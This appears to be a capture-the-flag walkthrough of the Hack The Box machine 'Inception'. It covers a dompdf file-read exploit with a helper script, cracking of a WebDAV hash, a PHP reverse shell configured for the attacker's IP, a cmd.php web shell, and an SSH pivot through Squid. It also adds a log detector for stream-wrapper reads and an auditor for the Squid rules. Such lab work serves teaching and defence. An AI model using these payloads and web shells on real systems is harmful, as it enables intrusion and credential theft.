Inception
Contents
Ports scan
u505@kali:~/HTB/Machines/Inception$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.67
Starting masscan 1.0.5 at 2020-05-27 18:29:31 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.67
Discovered open port 3128/tcp on 10.10.10.67
u505@kali:~/HTB/Machines/Inception$ nmap -sC -sV 10.10.10.67
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-27 14:29 EDT
Nmap scan report for inception.htb (10.10.10.67)
Host is up (0.039s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.29 seconds
Web Server
Dirsearch
u505@kali:~/HTB/Machines/Inception$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,js,html" -r 1 -f -t 1000 -u http://inception.htb/
Extensions: txt, js, html | HTTP method: get | Threads: 1000 | Wordlist size: 18379 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-27_14-53-05.log
Target: http://inception.htb/
[14:53:05] Starting:
[14:53:05] 403 - 293B - /.html
[14:53:09] 200 - 1KB - /assets/
[14:53:22] 403 - 294B - /icons/
[14:53:22] 200 - 1KB - /images/
[14:53:23] 200 - 3KB - /index.html
[14:53:25] 200 - 17KB - /LICENSE.txt
[14:53:32] 200 - 2KB - /README.txt
[14:53:33] 403 - 302B - /server-status/
[14:53:39] Starting: assets/
[14:53:40] 403 - 300B - /assets/.html
[14:53:46] 200 - 2KB - /assets/css/
[14:53:49] 200 - 2KB - /assets/fonts/
[14:53:52] 200 - 1KB - /assets/js/
[14:54:06] Starting: icons/
[14:54:07] 403 - 299B - /icons/.html
[14:54:34] 200 - 35KB - /icons/README.html
[14:54:38] 403 - 300B - /icons/small/
[14:54:44] Starting: images/
[14:54:45] 403 - 300B - /images/.html
[14:55:06] Starting: server-status/
Task Completed
Nothing of interest.
u505@kali:~/HTB/Machines/Inception$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -e "txt,js,html" -f -t 1000 -u http://inception.htb/
Extensions: txt, js, html | HTTP method: get | Threads: 1000 | Wordlist size: 326515
Error Log: /opt/utils/dirsearch/logs/errors-20-05-27_14-56-49.log
Target: http://inception.htb/
[14:56:49] Starting:
[14:56:51] 200 - 1KB - /assets/
[14:56:51] 200 - 3KB - /index.html
[14:57:07] 200 - 1KB - /images/
[14:57:07] 403 - 293B - /.html
[14:57:22] 403 - 294B - /icons/
Task Completed
The larger wordlist doesn't show anything either.
Folder dompdf
u505@kali:~/HTB/Machines/Inception$ curl http://inception.htb
<!DOCTYPE HTML>
<!--
Eventually by HTML5 UP
html5up.net | @ajlkn
Free for personal and commercial use under the CCA 3.0 license (html5up.net/license)
-->
<html>
<head>
<title>Inception</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<!--[if lte IE 8]><script src="assets/js/ie/html5shiv.js"></script><![endif]-->
<link rel="stylesheet" href="assets/css/main.css" />
<!--[if lte IE 8]><link rel="stylesheet" href="assets/css/ie8.css" /><![endif]-->
<!--[if lte IE 9]><link rel="stylesheet" href="assets/css/ie9.css" /><![endif]-->
</head>
<body>
<!-- Header -->
<header id="header">
<h1>Inception</h1>
<p>Dreams feel real while your in them right? <br />
Its only when you wake up when you realize they were actually strange. </p>
</header>
<!-- Signup Form -->
<form id="signup-form" method="post" action="#">
<input type="email" name="email" id="email" placeholder="Email Address" />
<input type="submit" value="Sign Up" />
</form>
<!-- Footer -->
<footer id="footer">
<ul class="icons">
<li><a href="#" class="icon fa-twitter"><span class="label">Twitter</span></a></li>
<li><a href="#" class="icon fa-instagram"><span class="label">Instagram</span></a></li>
<li><a href="#" class="icon fa-github"><span class="label">GitHub</span></a></li>
<li><a href="#" class="icon fa-envelope-o"><span class="label">Email</span></a></li>
</ul>
<ul class="copyright">
<li>© Inception, Inc.</li><li>Credits: Dominic Cobb</a></li>
</ul>
</footer>
<!-- Scripts -->
<!--[if lte IE 8]><script src="assets/js/ie/respond.min.js"></script><![endif]-->
<script src="assets/js/main.js"></script>
</body>
</html>
...
<!-- Todo: test dompdf on php 7.x -->
There is a comment at the end of the file, with a hint.
Arbitrary File read dompdf exploit
u505@kali:~/HTB/Machines/Inception$ searchsploit dompdf
-------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------- ---------------------------------
dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | php/webapps/33004.txt
dompdf 0.6.0 beta1 - Remote File Inclusion | php/webapps/14851.txt
TYPO3 Extension ke DomPDF - Remote Code Execution | php/webapps/35443.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
There is a VERSION file in the folder.
u505@kali:~/HTB/Machines/Inception$ curl http://10.10.10.67/dompdf/VERSION
0.6.0
This is the vulnerable version.
u505@kali:~/HTB/Machines/Inception$ searchsploit -m 33004
  Exploit: dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/33004
     Path: /usr/share/exploitdb/exploits/php/webapps/33004.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Inception/33004.txt
We try to exploit it by following the example.
u505@kali:~/HTB/Machines/Inception/enum$ curl http://inception.htb/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd -o etcpasswd.pdf
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2791  100  2791    0     0  29691      0 --:--:-- --:--:-- --:--:-- 29691
As expected, the generated pdf contains a base64 string.
u505@kali:~/HTB/Machines/Inception/enum$ pdftohtml -noframes etcpasswd.pdf
u505@kali:~/HTB/Machines/Inception/enum$ html2text etcpasswd.html | sed '/^============/d' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
cobb:x:1000:1000::/home/cobb:/bin/bash
The base64 string decodes to the remote /etc/passwd file, and we enumerate a first user, cobb.
Exploit automation
To enumerate the host, we create a simple script to automate the decode process.
u505@kali:~/HTB/Machines/Inception$ cat readfiletarget.sh
#!/bin/bash
# Usage: ./readfiletarget.sh /absolute/path/on/target
# The URL is quoted so that a path with shell metacharacters is passed intact.
curl -s "http://inception.htb/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=$1" \
  | awk '/\[\(/ { print substr($0,index($0,"(")+1,index($0,")")-index($0,"(")-1);}' \
  | base64 -d
curl fetches the generated PDF; awk pulls the base64 string out of the PDF text object (the part between the parentheses of the "[( ... )]" operator), and base64 decodes it.
u505@kali:~/HTB/Machines/Inception$ chmod +x readfiletarget.sh
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
cobb:x:1000:1000::/home/cobb:/bin/bash
This way is easier. ;)
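From the defender's side, every one of these reads leaves a clear trace in the Apache access log (the vhost logs in "combined" format): a request to dompdf.php whose input_file value starts with a PHP stream wrapper or an absolute path. The detector below is an added example, not part of the original writeup; the log lines are constructed to mirror the requests made here, and the function names are mine.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache "combined" log format, as configured by the CustomLog line on this box.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP stream wrappers that turn dompdf's input_file parameter into a file read.
STREAM_WRAPPERS = ("php://", "file://", "data://", "phar://", "glob://")

def analyse_target(target):
    """Reasons a request target looks like a dompdf 0.6.0 input_file file read."""
    reasons = []
    url = urlparse(target)
    if not url.path.lower().endswith("/dompdf.php"):
        return reasons
    for value in parse_qs(url.query).get("input_file", []):
        value = unquote(value)              # also catches double-encoded variants
        lowered = value.lower()
        if lowered.startswith(STREAM_WRAPPERS):
            reasons.append("stream wrapper: " + value.split("/resource=")[0])
        if lowered.startswith("/") or "../" in lowered or "/etc/" in lowered:
            reasons.append("absolute or traversal path: " + value.split("resource=")[-1])
    return reasons

def scan_log(lines):
    """Return one finding per suspicious request: who, when, what and why."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-format line; skip it
        reasons = analyse_target(m.group("target"))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "target": m.group("target"),
                "reasons": reasons,
            })
    return findings

# Constructed sample log, modelled on the requests made in this writeup.
SAMPLE_LOG = [
    '10.10.14.34 - - [27/May/2020:15:01:02 -0400] "GET /index.html HTTP/1.1" 200 3124 "-" "curl/7.68.0"',
    '10.10.14.34 - - [27/May/2020:15:03:11 -0400] "GET /dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2791 "-" "curl/7.68.0"',
    '10.10.14.34 - - [27/May/2020:15:07:45 -0400] "GET /dompdf/dompdf.php?input_file=/var/www/html/wordpress_4.8.3/wp-config.php HTTP/1.1" 200 3402 "-" "curl/7.68.0"',
    '10.10.14.34 - - [27/May/2020:15:09:00 -0400] "GET /dompdf/dompdf.php?input_file=www/test/demo.html HTTP/1.1" 200 1901 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["time"], f["status"], f["target"])
        for r in f["reasons"]:
            print("   -", r)
```

The relative-path request in the last sample line is left alone on purpose: dompdf's legitimate use is rendering files under its own tree, and alerting on every dompdf.php hit would bury the real reads.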
Apache config
After a while looking into files readable by www-data, there is interesting information in the Apache configuration.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
    # The ServerName directive sets the request scheme, hostname and port that
    # the server uses to identify itself. This is used when creating
    # redirection URLs. In the context of virtual hosts, the ServerName
    # specifies what hostname must appear in the request's Host: header to
    # match this virtual host. For the default virtual host (this file) this
    # value is not decisive as it is used as a last resort host regardless.
    # However, you must set it for any further virtual host explicitly.
    #ServerName www.example.com

    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html

    # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
    # error, crit, alert, emerg.
    # It is also possible to configure the loglevel for particular
    # modules, e.g.
    #LogLevel info ssl:warn

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

    # For most configuration files from conf-available/, which are
    # enabled or disabled at a global level, it is possible to
    # include a line for only one particular virtual host. For example the
    # following line enables the CGI configuration for this host only
    # after it has been globally disabled with "a2disconf".
    #Include conf-available/serve-cgi-bin.conf

    Alias /webdav_test_inception /var/www/html/webdav_test_inception
    <Location /webdav_test_inception>
        Options FollowSymLinks
        DAV On
        AuthType Basic
        AuthName "webdav test credential"
        AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
        Require valid-user
    </Location>
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
The WebDAV setup should allow us to upload files.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /var/www/html/webdav_test_inception/webdav.passwd
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
The file holds the WebDAV username and its Apache password hash.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /var/www/html/webdav_test_inception/webdav.passwd > webdav.passwd
We retrieve the auth file and analyze the hash.
u505@kali:~/HTB/Machines/Inception$ hashid '$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0'
Analyzing '$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0'
[+] MD5(APR)
[+] Apache MD5
Brute force of the hash.
u505@kali:~/HTB/Machines/Inception$ hashcat -m 1600 --username webdav.passwd /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
...
u505@kali:~/HTB/Machines/Inception$ hashcat -m 1600 --username webdav.passwd /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0:babygurl69
Reverse shell
u505@kali:~/HTB/Machines/Inception/enum$ davtest -url http://inception.htb/webdav_test_inception -auth webdav_tester:babygurl69
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://inception.htb/webdav_test_inception
********************************************************
NOTE    Random string for this session: zIoa0e1fdx
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx
********************************************************
 Sending test files
PUT     txt     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt
PUT     aspx    SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.aspx
PUT     shtml   SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.shtml
PUT     php     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php
PUT     pl      SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.pl
PUT     asp     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.asp
PUT     jhtml   SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jhtml
PUT     jsp     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jsp
PUT     html    SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html
PUT     cgi     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cgi
PUT     cfm     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cfm
********************************************************
 Checking for test file execution
EXEC    txt     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt
EXEC    aspx    FAIL
EXEC    shtml   FAIL
EXEC    php     SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php
EXEC    pl      FAIL
EXEC    asp     FAIL
EXEC    jhtml   FAIL
EXEC    jsp     FAIL
EXEC    html    SUCCEED:        http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html
EXEC    cgi     FAIL
EXEC    cfm     FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.aspx
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.shtml
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.pl
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.asp
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jhtml
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.jsp
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cgi
PUT File: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.cfm
Executes: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.txt
Executes: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.php
Executes: http://inception.htb/webdav_test_inception/DavTestDir_zIoa0e1fdx/davtest_zIoa0e1fdx.html
The test shows that uploaded PHP files are executed, so we generate a simple one.
u505@kali:~/HTB/Machines/Inception$ echo "<?php phpinfo() ?>" > u505.php
Upload of the phpinfo file.
u505@kali:~/HTB/Machines/Inception$ dave -u webdav_tester -p babygurl69 http://inception.htb/webdav_test_inception
dave -- DAV Explorer (v2.01)
Try "help", or "open http://host.com/dav_enabled_dir/"

** Connected to http://inception.htb/webdav_test_inception/ **
dave> put u505.php
put http://inception.htb/webdav_test_inception/u505.php (19 bytes) (success)
Setup of our reverse shell script.
u505@kali:~/HTB/Machines/Inception$ grep CHANGE php-reverse-shell.php
$ip = '10.10.14.34';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
u505@kali:~/HTB/Machines/Inception$ mv php-reverse-shell.php reverse.php
And upload it from the WebDAV command line console.
dave> put reverse.php
put http://inception.htb/webdav_test_inception/reverse.php (5493 bytes) (success)
Start the listener
u505@kali:~/HTB/Machines/Inception$ rlwrap nc -nlvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Call the reverse shell
u505@kali:~/HTB/Machines/Inception$ curl -v --user webdav_tester:babygurl69 http://inception.htb/webdav_test_inception/reverse.php
* Trying 10.10.10.67:80...
* TCP_NODELAY set
* Connected to inception.htb (10.10.10.67) port 80 (#0)
* Server auth using Basic with user 'webdav_tester'
> GET /webdav_test_inception/reverse.php HTTP/1.1
> Host: inception.htb
> Authorization: Basic d2ViZGF2X3Rlc3RlcjpiYWJ5Z3VybDY5
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 29 May 2020 02:08:02 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Vary: Accept-Encoding
< Content-Length: 94
< Content-Type: text/html; charset=UTF-8
<
WARNING: Failed to daemonise. This is quite common and not fatal.
Connection timed out (110)
* Connection #0 to host inception.htb left intact
And nothing! :(
Web shell
The reverse shell didn't work, so I tried with a simple web shell to figure out what is happening.
u505@kali:~/HTB/Machines/Inception$ cat cmd.php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Upload the web shell.
dave> put cmd.php put http://inception.htb/webdav_test_inception/cmd.php (156 bytes) (success)
Network Recon
We try to ping our box, but the packets are lost.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ping%20-c%201%2010.10.14.34
Checking the network config shows us that we are not on the target host but on another machine.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ifconfig
Listing the mounted file systems shows us that we are inside a container.
http://inception.htb/webdav_test_inception/cmd.php?cmd=mount%20-l
The container is listening on port 80 (HTTP, the one we are using), port 22 (SSH) and port 3128 (Squid proxy).
http://inception.htb/webdav_test_inception/cmd.php?cmd=netstat%20-nptul
The route table shows us the gateway is 192.168.0.1, possibly the target host.
http://inception.htb/webdav_test_inception/cmd.php?cmd=route%20-n
We can ping the target's "real" address 10.10.10.67.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ping%20-c%201%2010.10.10.67
But we can't ping the "real" network's gateway 10.10.10.2, so we can assume that a firewall is set up to block outgoing communication from the container.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ping%20-c%201%2010.10.10.2
Wordpress
There is a folder wordpress in the web root folder.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ls%20-l%20/var/www/html/
Accessing WordPress in the browser doesn't work, but we spot the configuration file in the folder.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ls%20-l%20/var/www/html/wordpress_4.8.3
The file contains a password.
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /var/www/html/wordpress_4.8.3/wp-config.php | grep "DB_"
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', );
Squid configuration
The Squid config file is located in the folder /etc/squid.
http://inception.htb/webdav_test_inception/cmd.php?cmd=ls%20-l%20/etc/squid/
u505@kali:~/HTB/Machines/Inception$ ./readfiletarget.sh /etc/squid/squid.conf | grep -v "^#" | grep -v "^$"
acl localnet src 192.168.0.0/16
acl localnet_dst dst 192.168.0.0/16
acl localnet_dst dst 10.0.0.0/8
acl SSL_ports port 443
acl Safe_ports port 80          # http
acl Safe_ports port 21          # ftp
acl Safe_ports port 443         # https
acl Safe_ports port 70          # gopher
acl Safe_ports port 210         # wais
acl Safe_ports port 1025-65535  # unregistered ports
acl Safe_ports port 280         # http-mgmt
acl Safe_ports port 488         # gss-http
acl Safe_ports port 591         # filemaker
acl Safe_ports port 777         # multiling http
acl CONNECT method CONNECT
http_access allow localhost manager
http_access deny manager
http_access deny localnet_dst
http_access allow localnet
http_access allow localhost
http_access deny all
http_port 3128
coredump_dir /var/spool/squid
refresh_pattern ^ftp:           1440    20%     10080
refresh_pattern ^gopher:        1440    0%      1440
refresh_pattern -i (/cgi-bin/|\?) 0     0%      0
refresh_pattern (Release|Packages(.gz)*)$      0       20%     2880
refresh_pattern .               0       20%     4320
The configuration allows Squid clients from localhost and 192.168.0.0/16 but denies destinations in 10.0.0.0/8, which means we can use Squid to proxy to the container or the container network.
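To see exactly which requests those ACLs let through, here is an added example (not part of the original writeup) that re-implements Squid's first-match http_access evaluation over the src/dst ACLs above. The client/destination pairs are constructed, and the case where our connection shows up with source 192.168.0.1 encodes the assumption, made later in this writeup, that the host NATs it to the container.

```python
import ipaddress

# src/dst ACLs from the container's squid.conf. "localhost" is Squid's built-in
# ACL for 127.0.0.1 and ::1. Port and method ACLs are left out: they do not
# change which networks the proxy is willing to reach.
ACLS = {
    "localhost":    ("src", ["127.0.0.1/32", "::1/128"]),
    "localnet":     ("src", ["192.168.0.0/16"]),
    "localnet_dst": ("dst", ["192.168.0.0/16", "10.0.0.0/8"]),
}

# http_access lines in file order (the two "manager" lines only govern the
# cache-manager endpoint and are omitted).
HTTP_ACCESS = [
    ("deny",  "localnet_dst"),
    ("allow", "localnet"),
    ("allow", "localhost"),
    ("deny",  "all"),
]

def acl_matches(name, src, dst):
    """True when ACL `name` matches a request from client `src` to destination `dst`."""
    if name == "all":
        return True
    kind, networks = ACLS[name]
    addr = ipaddress.ip_address(src if kind == "src" else dst)
    # `in` is False across IPv4/IPv6, so mixed-family entries are harmless.
    return any(addr in ipaddress.ip_network(net) for net in networks)

def decide(src, dst):
    """Squid semantics: the first http_access line whose ACL matches wins."""
    for action, acl in HTTP_ACCESS:
        if acl_matches(acl, src, dst):
            return action
    # Not reached here because of "deny all"; Squid would otherwise apply the
    # opposite of the last line's action.
    return "deny"

def audit(cases):
    """Evaluate (label, src, dst) triples and return {label: decision}."""
    return {label: decide(src, dst) for label, src, dst in cases}

# Constructed cases modelled on the addresses seen in this writeup.
CASES = [
    # Our connection as the container sees it once the host has NATed it.
    ("natted -> container sshd (127.0.0.1)",      "192.168.0.1", "127.0.0.1"),
    ("natted -> container eth0 (192.168.0.10)",   "192.168.0.1", "192.168.0.10"),
    ("natted -> attacker box (10.10.14.34)",      "192.168.0.1", "10.10.14.34"),
    # Without NAT the client address would not be in localnet at all.
    ("direct 10.10.14.34 -> 127.0.0.1",           "10.10.14.34", "127.0.0.1"),
    # Nothing denies public destinations for localnet clients.
    ("natted -> public address (203.0.113.5)",    "192.168.0.1", "203.0.113.5"),
]

if __name__ == "__main__":
    for label, verdict in audit(CASES).items():
        print(f"{verdict:5}  {label}")
```

The run shows why the pivot works only through 127.0.0.1: localnet_dst blocks the container network and the 10.0.0.0/8 range but says nothing about loopback, and the same rule set would also forward a NATed client to arbitrary public addresses.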
SSH container access
First we need to install the connect-proxy package.
u505@kali:~/HTB/Machines/Inception$ sudo apt install connect-proxy
[sudo] password for u505:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  connect-proxy
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 19.2 kB of archives.
After this operation, 65.5 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 connect-proxy amd64 1.105-1+b1 [19.2 kB]
Fetched 19.2 kB in 1s (16.3 kB/s)
Selecting previously unselected package connect-proxy.
(Reading database ... 534872 files and directories currently installed.)
Preparing to unpack .../connect-proxy_1.105-1+b1_amd64.deb ...
Unpacking connect-proxy (1.105-1+b1) ...
Setting up connect-proxy (1.105-1+b1) ...
Processing triggers for kali-menu (2020.2.2) ...
Processing triggers for man-db (2.9.1-1) ...
We set up the SSH config file to connect through the proxy to localhost, because the proxy is actually running on the container (port 3128 is listening on the container). I assume that the host is NATting the connection to the container.
u505@kali:~/HTB/Machines/Inception$ cat ~/.ssh/config
Host inceptionproxy
    ProxyCommand connect -H 10.10.10.67:3128 127.0.0.1 22
We connect with the user cobb and try the password that we found in the WordPress config file.
u505@kali:~/HTB/Machines/Inception$ ssh cobb@inceptionproxy
The authenticity of host 'inceptionproxy (<no hostip for proxy command>)' can't be established.
ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'inceptionproxy' (ECDSA) to the list of known hosts.
cobb@inceptionproxy's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
